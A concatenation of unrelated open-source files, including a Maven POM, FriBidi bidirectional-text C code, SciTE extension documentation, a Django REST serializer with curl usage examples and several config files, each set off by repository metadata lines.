                ('assignment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,
                    related_name='iterations', to='orchestra.TaskAssignment')),
            ],
        ),
    ]
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!--
Copyright 2017 StreamSets Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-root-lib</artifactId>
<version>3.20.0-SNAPSHOT</version>
<relativePath>../root-lib</relativePath>
</parent>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-elasticsearch-protolib</artifactId>
<version>3.20.0-SNAPSHOT</version>
<description>StreamSets Data Collector Elastic Search ProtoLib</description>
<name>StreamSets Data Collector Elastic Search ProtoLib</name>
<packaging>jar</packaging>
<properties>
<elasticsearch.version>5.3.0</elasticsearch.version>
<gson.version>2.2.4</gson.version>
<log4j2.version>2.7</log4j2.version>
</properties>
<dependencies>
<!-- Test Dependencies -->
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>${jackson.version}</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.mockito</groupId>
<artifactId>mockito-core</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.mock-server</groupId>
<artifactId>mockserver-netty</artifactId>
<version>${mockserver.version}</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.elasticsearch</groupId>
<artifactId>elasticsearch</artifactId>
<version>${elasticsearch.version}</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.awaitility</groupId>
<artifactId>awaitility</artifactId>
<version>${awaitility.version}</version>
</dependency>
<!-- Do not move this below commonlib dependency or wrong netty will be loaded for tests -->
<dependency>
<groupId>org.elasticsearch.plugin</groupId>
<artifactId>transport-netty4-client</artifactId>
<version>${elasticsearch.version}</version>
<scope>test</scope>
</dependency>
<!-- Provided Dependencies -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>${log4j2.version}</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>${log4j2.version}</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>com.google.code.gson</groupId>
<version>${gson.version}</version>
<artifactId>gson</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-api</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-aws-support</artifactId>
<!-- version>${project.version}</version -->
</dependency>
<dependency>
<groupId>log4j</groupId>
<artifactId>log4j</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-api</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-log4j12</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>io.dropwizard.metrics</groupId>
<artifactId>metrics-core</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-sdk</artifactId>
<scope>provided</scope>
</dependency>
<!-- Compile Dependencies -->
<dependency>
<groupId>org.elasticsearch.client</groupId>
<artifactId>rest</artifactId>
<version>${elasticsearch.version}</version>
</dependency>
<dependency>
<groupId>org.elasticsearch.client</groupId>
<artifactId>sniffer</artifactId>
<version>${elasticsearch.version}</version>
</dependency>
<dependency>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-common</artifactId>
<scope>compile</scope>
<exclusions>
<exclusion>
<groupId>commons-io</groupId>
<artifactId>commons-io</artifactId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-commonlib</artifactId>
<scope>compile</scope>
</dependency>
<dependency>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-commonlib</artifactId>
<type>test-jar</type>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-stagesupport</artifactId>
<type>test-jar</type>
<scope>test</scope>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-deploy-plugin</artifactId>
<version>2.8.2</version>
<configuration>
<skip>true</skip>
</configuration>
</plugin>
<!-- create test jar -->
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-jar-plugin</artifactId>
<executions>
<execution>
<goals>
<goal>test-jar</goal>
</goals>
</execution>
</executions>
</plugin>
</plugins>
</build>
</project>
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2013-2020 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import org.springframework.cloud.contract.spec.Contract
// Contract: any GET request to /foo13 is stubbed to return HTTP 200
// with no response body.
Contract.make {
	request {
		method(GET())
		url("/foo13")
	}
	response {
		status(200)
	}
}
| {
"pile_set_name": "Github"
} |
{
"extends": [ "tslint-angular", "tslint-config-standard" ],
"rules": {
"deprecation": {
"severity": "warning"
},
"no-inferrable-types": true,
"eofline": true,
"max-line-length": [true, 140],
"no-floating-promises": false, // Memory issues
"await-promise": [true, "PromiseLike"],
"member-ordering": [true, {
"order": [
"public-static-field",
"private-static-field",
"public-instance-field",
"private-instance-field",
"public-constructor",
"private-constructor",
"public-instance-method",
"protected-instance-method",
"private-instance-method"
]}
],
"variable-name": [
true,
"ban-keywords",
"check-format",
"allow-leading-underscore",
"allow-pascal-case",
"allow-trailing-underscore"
],
"no-shadowed-variable": false,
"no-bitwise": false,
"max-classes-per-file": false,
"interface-over-type-literal": false
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator" content="SciTE" />
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>
SciTE Extension Interface
</title>
<style type="text/css">
.example {
color: #00A000;
font-weight: bold;
}
DIV.example {
background: #F7FCF7;
border: 1px solid #C0D7C0;
margin: 0.3em 3em;
padding: 0.3em 0.6em;
font-size: 80%;
}
</style>
</head>
<body bgcolor="#FFFFFF" text="#000000">
<table bgcolor="#000000" width="100%" cellspacing="0" cellpadding="0" border="0">
<tr>
<td>
<img src="SciTEIco.png" border="3" height="64" width="64" alt="Scintilla icon" />
</td>
<td>
<a href="index.html" style="color:white;text-decoration:none"><font size="5">
SciTE Extension Interface</font></a>
</td>
</tr>
</table>
<h3>
Purpose.
</h3>
<p>Some people want to create enhanced versions of the SciTE editor, while
still receiving the benefits of new SciTE features. This could be for an
editor designed for a particular environment such as developing games,
to incorporate a scripting capability within SciTE or to allow SciTE to be
controlled by another process through an IPC mechanism.</p>
<p>There are two example extensions.
The <a href="SciTEDirector.html">SciTE Director Interface</a> allows
SciTE on Windows to be controlled by an external application such as a
project manager.
The <a href="SciTELua.html">SciTE Lua Scripting Extension</a> is an
integration of the Lua scripting language into SciTE, done using the Extension
interface.</p>
<h3>
Extension Interface.
</h3>
<div class="example">
bool Initialise(ExtensionAPI *host_);<br />
bool Finalise();<br />
bool Clear();<br />
bool Load(const char *filename);<br />
bool InitBuffer(int index);<br />
bool ActivateBuffer(int index);<br />
bool RemoveBuffer(int index);<br />
bool OnOpen(const char *path);<br />
bool OnSwitchFile(const char *path);<br />
bool OnBeforeSave(const char *path);<br />
bool OnSave(const char *path);<br />
bool OnChar(char ch);<br />
bool OnExecute(const char *s);<br />
bool OnSavePointReached();<br />
bool OnSavePointLeft();<br />
bool OnStyle(unsigned int, int, int, Accessor *);<br />
bool OnDoubleClick();<br />
bool OnUpdateUI();<br />
bool OnMarginClick();<br />
bool OnMacro(const char *, const char *);<br />
bool SendProperty(const char *);<br />
bool OnKey(int keyval, int modifiers);<br />
bool OnDwellStart(int pos, const char *word);<br />
bool OnClose(const char *filename);<br />
</div>
<p>An extension must implement the Extension interface defined in scite/src/Extender.h
Only the first 4 methods must be implemented although an implementation can be as
simple as just returning false. The other methods have empty default implementations.
Methods added to this interface in the future should have default implementations so
existing extensions will continue to compile.</p>
<p>Each method returns a bool indicating whether the method handled all processing that
is needed and so no additional processing is required. Normally, false is returned to indicate
that further processing may be done.</p>
<p>The extension should use the Initialise and Finalise methods to allocate
and deallocate resources. The ExtensionAPI pointer should be saved in the
Initialise method so the extension can communicate back to SciTE.</p>
<p>The Clear and Load methods are used to support extensions that need
to load a resource such as a script file when a file is opened. When a file is
opened in SciTE, first the extension is asked to clear any data associated with
the previous file through Clear. Then SciTE checks for a property called
"extension" which matches the file name, so for x.cpp, looks for extension.*.cpp.
A file with this name is searched for in standard property file locations and if found
Load is called with the path as an argument.</p>
<p>The InitBuffer, ActivateBuffer, and RemoveBuffer methods provide the necessary hooks
so that extensions have a mechanism to associate data with a specific buffer, similar
to the way SciTE itself remembers the monospace setting of each buffer. InitBuffer is
called whenever a new document is opened in a given buffer. The buffer might be a newly
allocated one, or it might be recycled if the maximum number of buffers has been reached.
Once the buffer has been initialized, it will be the active buffer. Thereafter,
ActivateBuffer is called whenever the user switches to another loaded buffer.
RemoveBuffer is called when an existing buffer is closed. Thereafter, the indexes of
the buffers that come after the removed buffer are shifted down by one. After
RemoveBuffer, the extension will receive an InitBuffer or ActivateBuffer to establish
the new active buffer.</p>
<p>OnExecute is called only when an extension command is executed. These are
indicated in properties as subsystem 3.</p>
<p>OnBeforeSave is called before saving the file and an extension may implement
file saving itself and return true to prevent the default file save code from executing.</p>
<p>Other methods are called upon events occurring in SciTE allowing an extension
to respond to those events.</p>
<h3>
ExtensionAPI Interface.
</h3>
<div class="example">
enum Pane { paneEditor=1, paneOutput=2, paneFindOutput=3 };<br />
sptr_t Send(Pane p, unsigned int msg, uptr_t wParam=0, sptr_t lParam=0);<br />
char *Range(Pane p, int start, int end);<br />
void Remove(Pane p, int start, int end);<br />
void Insert(Pane p, int pos, const char *s);<br />
void Trace(const char *s);<br />
char *Property(const char *key);<br />
void SetProperty(const char *key, const char *val);<br />
uptr_t GetInstance();<br />
void ShutDown();<br />
void Perform(const char *actions);<br />
void DoMenuCommand(int cmdID);<br />
void UpdateStatusBar(bool bUpdateSlowData);<br />
</div>
<p>An extension can call back into SciTE using this interface which is a simplified
way to access the functionality of SciTE.</p>
<p>As well as the normal editor pane and output pane, this interface allows for
a future feature where a third pane may be used for the output of search
commands. This is currently mapped to the output pane.</p>
<p>Send allows sending messages to the Scintilla control contained in each pane.</p>
<p>Range retrieves text from the pane. This must be deleted with delete[].
Remove and Insert are used to remove and insert text in a pane.</p>
<p>Trace displays a string at the end of the output pane.</p>
<p>SciTE's properties can be read and written with Property and
SetProperty. The result from Property should be deleted with delete[].</p>
<p>GetInstance is Windows specific and returns the HINSTANCE of
the application which is needed when accessing platform facilities.</p>
<p>ShutDown is equivalent to the user choosing the Quit menu item.
If there are any unsaved files loaded, then the user is asked whether to save them
and may cancel from this dialog. So under some circumstances, the application will
continue to run after ShutDown is called.</p>
<p>Perform takes a string containing an action, a ':' character, and an argument.
Currently the only known action is open and then the argument is a path.
This is used by the <a href="SciTEDirector.html">Director extension</a>
to relay commands from another application.
In the future more actions will be possible through this method.</p>
<h3>
Attaching the extension.
</h3>
<p>Extensions are currently added explicitly by code in the start up function.
On Windows, the DirectorExtension is attached with code similar to this simplified
example:</p>
<div class="example">
DirectorExtension director;<br />
Extension *extender = &amp;director;<br />
//...<br />
SciTEWin MainWind(extender);
</div>
<p>It would be better to move to an implicit attachment mechanism similar to the
way lexers are attached to Scintilla, determining which extensions are used
by simply linking their object files into SciTE. It would also be good to
allow run-time attachment of extensions housed in DLLs or shared object libraries.</p>
<h3>
Multiplexing.
</h3>
<p>SciTE supports multiple extensions at a time. A multiplexer extension
maintains a list of extensions and calls each in turn for each method. Once an extension
returns true indicating processing should stop, the multiplexer returns without traversing
any remaining list members. However, for some methods such as Initialise and Finalise,
the remaining extensions are traversed regardless of the return value of the previous
extension.</p>
<h3>
Thread safety.
</h3>
<p>In general, SciTE is a single threaded application. However, on Windows, command
tools call OnExecute from a separate worker thread. The SingleThreadExtension adapter
class can be used to wrap an extension so that OnExecute calls are marshalled to the
main thread. Of course, this is not necessary if your extension is thread safe, or
if it does not implement OnExecute, or if it is a GTK-specific extension.</p>
</body>
</html>
| {
"pile_set_name": "Github"
} |
/* FriBidi
* fribidi.c - Unicode bidirectional and Arabic joining/shaping algorithms
*
* Authors:
* Behdad Esfahbod, 2001, 2002, 2004
* Dov Grobgeld, 1999, 2000
*
* Copyright (C) 2004 Sharif FarsiWeb, Inc
* Copyright (C) 2001,2002 Behdad Esfahbod
* Copyright (C) 1999,2000 Dov Grobgeld
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with this library, in a file named COPYING; if not, write to the
* Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
* Boston, MA 02110-1301, USA
*
* For licensing issues, contact <[email protected]>.
*/
#include "common.h"
#include <fribidi.h>
#ifdef DEBUG
static int flag_debug = false;
#endif
/* Report whether FriBidi debug tracing is currently enabled.
 * In builds compiled without DEBUG this always returns false. */
FRIBIDI_ENTRY fribidi_boolean
fribidi_debug_status (
  void
)
{
#ifdef DEBUG
  return flag_debug;
#else
  return false;
#endif
}
/* Turn debug tracing on or off and return the resulting state.
 * A no-op returning false in builds compiled without DEBUG, so callers
 * can detect that the request had no effect. */
FRIBIDI_ENTRY fribidi_boolean
fribidi_set_debug (
  /* input */
  fribidi_boolean state
)
{
#ifdef DEBUG
  return flag_debug = state;
#else
  return false;
#endif
}
/* Remove bidi control characters from str in place: explicit
 * embedding/override codes, boundary neutrals, isolate codes, and the
 * LRM/RLM mark characters.  The optional embedding_levels and position
 * mapping arrays are compacted in step with the string.
 * Returns the new (shortened) length, or -1 on allocation failure. */
FRIBIDI_ENTRY FriBidiStrIndex
fribidi_remove_bidi_marks (
  FriBidiChar *str,
  const FriBidiStrIndex len,
  FriBidiStrIndex *positions_to_this,
  FriBidiStrIndex *position_from_this_list,
  FriBidiLevel *embedding_levels
)
{
  register FriBidiStrIndex i, j = 0;
  fribidi_boolean private_from_this = false;
  fribidi_boolean status = false;

  /* Empty input: nothing to do, report length 0 via status/j. */
  if UNLIKELY
    (len == 0)
    {
      status = true;
      goto out;
    }

  DBG ("in fribidi_remove_bidi_marks");

  fribidi_assert (str);

  /* If to_this is not NULL, we must have from_this as well. If it is
     not given by the caller, we have to make a private instance of it. */
  if (positions_to_this && !position_from_this_list)
    {
      position_from_this_list = fribidi_malloc (sizeof
						(position_from_this_list[0]) *
						len);
      if UNLIKELY
	(!position_from_this_list) goto out;
      private_from_this = true;
      /* Seed the inverse mapping from the caller-supplied forward one. */
      for (i = 0; i < len; i++)
	position_from_this_list[positions_to_this[i]] = i;
    }

  /* Compact: copy only the characters to keep, advancing j as the write
     cursor; the aux arrays move in lock-step so indexes stay aligned. */
  for (i = 0; i < len; i++)
    if (!FRIBIDI_IS_EXPLICIT_OR_BN (fribidi_get_bidi_type (str[i]))
	&& !FRIBIDI_IS_ISOLATE (fribidi_get_bidi_type (str[i]))
	&& str[i] != FRIBIDI_CHAR_LRM && str[i] != FRIBIDI_CHAR_RLM)
      {
	str[j] = str[i];
	if (embedding_levels)
	  embedding_levels[j] = embedding_levels[i];
	if (position_from_this_list)
	  position_from_this_list[j] = position_from_this_list[i];
	j++;
      }

  /* Convert the from_this list to to_this */
  if (positions_to_this)
    {
      /* -1 marks positions whose character was removed. */
      for (i = 0; i < len; i++)
	positions_to_this[i] = -1;
      for (i = 0; i < len; i++)
	positions_to_this[position_from_this_list[i]] = i;
    }

  status = true;

out:
  if (private_from_this)
    fribidi_free (position_from_this_list);

  return status ? j : -1;
}
/* Local array size, used for stack-based local arrays */
#define LOCAL_LIST_SIZE 128
static FriBidiFlags flags = FRIBIDI_FLAGS_DEFAULT | FRIBIDI_FLAGS_ARABIC;
/* One-shot logical-to-visual conversion (legacy convenience API).
 * Computes bidi types, bracket types and embedding levels for str,
 * optionally produces the reordered visual string (with Arabic
 * joining/shaping applied) and the L<->V position mappings.
 * Treats the whole input as a single line.
 * Returns max embedding level + 1 on success, 0 on failure.
 * Fix vs. original: the ar_props allocation is now checked for failure,
 * consistent with every other allocation in this function. */
FRIBIDI_ENTRY FriBidiLevel
fribidi_log2vis (
  /* input */
  const FriBidiChar *str,
  const FriBidiStrIndex len,
  /* input and output */
  FriBidiParType *pbase_dir,
  /* output */
  FriBidiChar *visual_str,
  FriBidiStrIndex *positions_L_to_V,
  FriBidiStrIndex *positions_V_to_L,
  FriBidiLevel *embedding_levels
)
{
  register FriBidiStrIndex i;
  FriBidiLevel max_level = 0;
  fribidi_boolean private_V_to_L = false;
  fribidi_boolean private_embedding_levels = false;
  fribidi_boolean status = false;
  /* Stack buffers avoid malloc for short strings (< LOCAL_LIST_SIZE). */
  FriBidiArabicProp local_ar_props[LOCAL_LIST_SIZE];
  FriBidiArabicProp *ar_props = NULL;
  FriBidiLevel local_embedding_levels[LOCAL_LIST_SIZE];
  FriBidiCharType local_bidi_types[LOCAL_LIST_SIZE];
  FriBidiCharType *bidi_types = NULL;
  FriBidiBracketType local_bracket_types[LOCAL_LIST_SIZE];
  FriBidiBracketType *bracket_types = NULL;
  FriBidiStrIndex local_positions_V_to_L[LOCAL_LIST_SIZE];

  if UNLIKELY
    (len == 0)
    {
      status = true;
      goto out;
    }

  DBG ("in fribidi_log2vis");

  fribidi_assert (str);
  fribidi_assert (pbase_dir);

  if (len < LOCAL_LIST_SIZE)
    bidi_types = local_bidi_types;
  else
    bidi_types = fribidi_malloc (len * sizeof bidi_types[0]);
  if (!bidi_types)
    goto out;

  fribidi_get_bidi_types (str, len, bidi_types);

  if (len < LOCAL_LIST_SIZE)
    bracket_types = local_bracket_types;
  else
    bracket_types = fribidi_malloc (len * sizeof bracket_types[0]);
  if (!bracket_types)
    goto out;

  fribidi_get_bracket_types (str, len, bidi_types,
			     /* output */
			     bracket_types);

  /* Caller may supply the levels buffer; otherwise make a private one. */
  if (!embedding_levels)
    {
      if (len < LOCAL_LIST_SIZE)
	embedding_levels = local_embedding_levels;
      else
	embedding_levels = fribidi_malloc (len * sizeof embedding_levels[0]);
      if (!embedding_levels)
	goto out;
      private_embedding_levels = true;
    }

  max_level = fribidi_get_par_embedding_levels_ex (bidi_types,
                                                   bracket_types,
                                                   len,
                                                   pbase_dir,
                                                   embedding_levels) - 1;
  if UNLIKELY
    (max_level < 0) goto out;

  /* If l2v is to be calculated we must have v2l as well. If it is not
     given by the caller, we have to make a private instance of it. */
  if (positions_L_to_V && !positions_V_to_L)
    {
      if (len < LOCAL_LIST_SIZE)
	positions_V_to_L = local_positions_V_to_L;
      else
	positions_V_to_L =
	  (FriBidiStrIndex *) fribidi_malloc (sizeof (FriBidiStrIndex) * len);
      if (!positions_V_to_L)
	goto out;
      private_V_to_L = true;
    }

  /* Set up the ordering array to identity order */
  if (positions_V_to_L)
    {
      for (i = 0; i < len; i++)
	positions_V_to_L[i] = i;
    }

  if (visual_str)
    {
      memcpy (visual_str, str, len * sizeof (*visual_str));

      /* Arabic joining */
      if (len < LOCAL_LIST_SIZE)
	ar_props = local_ar_props;
      else
	ar_props = fribidi_malloc (len * sizeof ar_props[0]);
      /* Bug fix: this allocation was previously used unchecked; a failed
         malloc would have been passed straight to fribidi_get_joining_types.
         The cleanup at `out' already copes with ar_props == NULL. */
      if (!ar_props)
	goto out;
      fribidi_get_joining_types (str, len, ar_props);
      fribidi_join_arabic (bidi_types, len, embedding_levels, ar_props);
      fribidi_shape (flags, embedding_levels, len, ar_props, visual_str);
    }

  /* line breaking goes here, but we assume one line in this function */

  /* and this should be called once per line, but again, we assume one
   * line in this deprecated function */
  status =
    fribidi_reorder_line (flags, bidi_types, len, 0, *pbase_dir,
			  embedding_levels, visual_str,
			  positions_V_to_L);

  /* Convert the v2l list to l2v */
  if (positions_L_to_V)
    {
      for (i = 0; i < len; i++)
	positions_L_to_V[i] = -1;
      for (i = 0; i < len; i++)
	positions_L_to_V[positions_V_to_L[i]] = i;
    }

out:
  /* Free only what we privately heap-allocated (never the stack buffers). */
  if (private_V_to_L && positions_V_to_L != local_positions_V_to_L)
    fribidi_free (positions_V_to_L);
  if (private_embedding_levels && embedding_levels != local_embedding_levels)
    fribidi_free (embedding_levels);
  if (ar_props && ar_props != local_ar_props)
    fribidi_free (ar_props);
  if (bidi_types && bidi_types != local_bidi_types)
    fribidi_free (bidi_types);
  if (bracket_types && bracket_types != local_bracket_types)
    fribidi_free (bracket_types);

  return status ? max_level + 1 : 0;
}
const char *fribidi_unicode_version = FRIBIDI_UNICODE_VERSION;
const char *fribidi_version_info =
"(" FRIBIDI_NAME ") " FRIBIDI_VERSION "\n"
"interface version " FRIBIDI_INTERFACE_VERSION_STRING ",\n"
"Unicode Character Database version " FRIBIDI_UNICODE_VERSION ",\n"
"Configure options"
#ifdef DEBUG
" --enable-debug"
#endif /* DEBUG */
".\n\n"
"Copyright (C) 2004 Sharif FarsiWeb, Inc.\n"
"Copyright (C) 2001, 2002, 2004, 2005 Behdad Esfahbod\n"
"Copyright (C) 1999, 2000, 2017, 2018, 2019 Dov Grobgeld\n"
FRIBIDI_NAME " comes with NO WARRANTY, to the extent permitted by law.\n"
"You may redistribute copies of " FRIBIDI_NAME " under\n"
"the terms of the GNU Lesser General Public License.\n"
"For more information about these matters, see the file named COPYING.\n\n"
"Written by Behdad Esfahbod and Dov Grobgeld.\n";
/* Editor directions:
* vim:textwidth=78:tabstop=8:shiftwidth=2:autoindent:cindent
*/
| {
"pile_set_name": "Github"
} |
# -*- coding: utf-8 -*-
#
# Newfies-Dialer License
# http://www.newfies-dialer.org
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (C) 2011-2015 Star2Billing S.L.
#
# The primary maintainer of this project is
# Arezqui Belaid <[email protected]>
#
from rest_framework import serializers
from dialer_contact.models import Phonebook
class PhonebookSerializer(serializers.HyperlinkedModelSerializer):
    """
    REST serializer exposing Phonebook objects at /rest-api/phonebook/.

    **Create**:

        CURL Usage::

            curl -u username:password --dump-header - -H "Content-Type:application/json" -X POST --data '{"name": "myphonebook"}' http://localhost:8000/rest-api/phonebook/

        Response::

            HTTP/1.0 201 CREATED
            Date: Fri, 14 Jun 2013 09:52:27 GMT
            Server: WSGIServer/0.1 Python/2.7.3
            Vary: Accept, Accept-Language, Cookie
            Content-Type: application/json; charset=utf-8
            Content-Language: en-us
            Allow: GET, POST, HEAD, OPTIONS

    **Read**:

        CURL Usage::

            curl -u username:password -H 'Accept: application/json' http://localhost:8000/rest-api/phonebook/

            curl -u username:password -H 'Accept: application/json' http://localhost:8000/rest-api/phonebook/%phonebook-id%/

        Response::

            {
                "count": 1,
                "next": null,
                "previous": null,
                "results": [
                    {
                        "url": "http://127.0.0.1:8000/rest-api/phonebook/1/",
                        "name": "Default_Phonebook",
                        "description": "",
                        "user": "http://127.0.0.1:8000/rest-api/users/1/",
                        "created_date": "2011-04-08T07:55:05",
                        "updated_date": "2011-04-08T07:55:05"
                    }
                ]
            }

    **Update**:

        CURL Usage::

            curl -u username:password --dump-header - -H "Content-Type: application/json" -X PATCH --data '{"name": "mylittle phonebook"}' http://localhost:8000/rest-api/phonebook/%phonebook-id%/

        Response::

            HTTP/1.0 200 NO CONTENT
            Date: Fri, 23 Sep 2011 06:46:12 GMT
            Server: WSGIServer/0.1 Python/2.7.1+
            Vary: Accept-Language, Cookie
            Content-Length: 0
            Content-Type: text/html; charset=utf-8
            Content-Language: en-us

    **Delete**:

        CURL Usage::

            curl -u username:password --dump-header - -H "Content-Type: application/json" -X DELETE http://localhost:8000/rest-api/phonebook/%phonebook-id%/
    """
    # Owner of the phonebook, populated from the model's ``user`` attribute.
    # NOTE(review): ``serializers.Field`` with an explicit ``source`` is the
    # DRF 2.x read-only style; confirm the installed DRF version before
    # modernizing (DRF 3.x would reject source == field name).
    user = serializers.Field(source='user')

    class Meta:
        # Serialize all default fields of the Phonebook model.
        model = Phonebook
| {
"pile_set_name": "Github"
} |
invitations.header.label=\u9080\u8ACB
invitations.accept.label=\u63A5\u53D7
invitations.members.label=\u6210\u54E1
invitations.space.label=\u7A7A\u9593
invitations.public.label=\u516C\u958B
invitations.private.label=\u79C1\u4EBA
| {
"pile_set_name": "Github"
} |
********************************************************************
* The original ffamber ports were written by Eric J. Sorin, *
* CSU Long Beach, Dept. of Chem & Biochem, and have now been *
* integrated with the standard gromacs distribution. *
* (Please don't blame Eric for errors we might have introduced.) *
* For the implementation/validation, please read/cite: *
* Sorin & Pande (2005). Biophys. J. 88(4), 2472-2493. *
* For related material and updates, please consult *
* http://chemistry.csulb.edu/ffamber/ *
********************************************************************
#define _FF_AMBER
#define _FF_AMBER96
[ defaults ]
; nbfunc comb-rule gen-pairs fudgeLJ fudgeQQ
1 2 yes 0.5 0.8333
#include "ffnonbonded.itp"
#include "ffbonded.itp"
| {
"pile_set_name": "Github"
} |
{
"images" : [
{
"idiom" : "universal",
"filename" : "v-throbber.png",
"scale" : "1x"
},
{
"idiom" : "universal",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"idiom" : "universal",
"filename" : "[email protected]",
"scale" : "3x"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
} | {
"pile_set_name": "Github"
} |
<?php
/*
* This file is part of the Prophecy.
* (c) Konstantin Kudryashov <[email protected]>
* Marcello Duarte <[email protected]>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Prophecy\Exception\Prediction;
use RuntimeException;
/**
* Basic failed prediction exception.
* Use it for custom prediction failures.
*
* @author Konstantin Kudryashov <[email protected]>
*/
class FailedPredictionException extends RuntimeException implements PredictionException
{
    // Intentionally empty: this class only brands a RuntimeException as a
    // prediction failure so callers can catch PredictionException uniformly.
}
| {
"pile_set_name": "Github"
} |
' <snippetlockinvoicepricing>
' Lock the invoice pricing
Dim lockInvoiceRequest As New LockInvoicePricingRequest() With {.InvoiceId = _invoiceId}
_serviceProxy.Execute(lockInvoiceRequest)
Console.WriteLine("Invoice pricing locked.")
' Update the price list
priceListItem.Amount = New Money(40D)
updatePriceListItem = New UpdateRequest() With {.Target = priceListItem}
_serviceProxy.Execute(updatePriceListItem)
Console.WriteLine("Price list updated.")
' </snippetlockinvoicepricing> | {
"pile_set_name": "Github"
} |
//
// SyncTest.h
// SharkORMTests
//
// Created by Adrian Herridge on 18/07/2018.
// Copyright © 2018 Adrian Herridge. All rights reserved.
//
#import "BaseTestCase.h"
/// Test case exercising SharkORM synchronisation behaviour; inherits the
/// shared fixture setup/teardown from BaseTestCase. Test methods live in
/// the corresponding implementation file.
@interface SyncTest : BaseTestCase

@end
| {
"pile_set_name": "Github"
} |
id: BUILDINGS.STONE_DEPOSIT
name: _ Stone Deposit
baseclass: nature.ResourceDeposit
radius: 0
cost: 0
cost_inactive: 0
size_x: 3
size_y: 3
inhabitants: 0
tooltip_text: null
tier: TIER.NATURE
buildingcosts: {}
components:
- SelectableComponent:
type: building
tabs: [ResourceDepositOverviewTab,]
enemy_tabs: [ResourceDepositOverviewTab,]
- HealthComponent: {maxhealth: 10}
- DepositComponent:
resources:
RES.STONE_DEPOSIT:
min_amount: 750
max_amount: 1250
- StorageComponent:
SlotsStorage:
slot_sizes: {RES.STONE_DEPOSIT: 1000000}
actionsets:
TIER.NATURE:
as_stonedeposit0:
| {
"pile_set_name": "Github"
} |
# model settings
# SOLOv2 instance-segmentation model with a ResNet-101 backbone and FPN neck.
model = dict(
    type='SOLO',
    pretrained='torchvision://resnet101',
    backbone=dict(
        type='ResNet',
        depth=101,
        num_stages=4,
        out_indices=(0, 1, 2, 3),  # C2, C3, C4, C5
        frozen_stages=1,  # freeze stem + stage 1 during training
        style='pytorch'),
    neck=dict(
        type='FPN',
        in_channels=[256, 512, 1024, 2048],
        out_channels=256,
        start_level=0,
        num_outs=5),
    bbox_head=dict(
        type='SOLOV2Head',
